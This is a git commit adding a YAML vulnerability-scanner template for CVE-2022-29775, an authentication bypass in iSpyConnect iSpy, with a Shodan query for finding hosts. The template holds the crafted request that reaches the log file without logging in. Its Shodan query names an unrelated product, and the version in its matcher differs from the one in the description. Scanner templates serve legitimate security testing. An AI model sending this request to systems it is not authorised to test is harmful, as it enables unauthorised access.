Create CVE-2022-29775.yaml

patch-1
Arafat Ansari 2022-09-15 00:01:24 +05:30 committed by GitHub
parent 1c14ed2ae0
commit 09e231addd
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 32 additions and 0 deletions

View File

@ -0,0 +1,32 @@
id: CVE-2022-29775
info:
name: iSpyConnect iSpy v7.2.2.0 - Improper Authentication.
author: arafatansari
severity: critical
description: |
iSpyConnect iSpy v7.2.2.0 allows attackers to bypass authentication via a crafted URL.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29775
- https://github.com/securylight/CVES_write_ups/blob/main/iSpy_connect.pdf
metadata:
shodan-query: http.html:"Phpjabbers"
verified: true
tags: improper,authentication,cve,2022
requests:
- raw:
- |
GET /logfile?d=crossdomain.xml HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'Log File'
- '<title>iSpy v7.2.1.0 Log File</title>'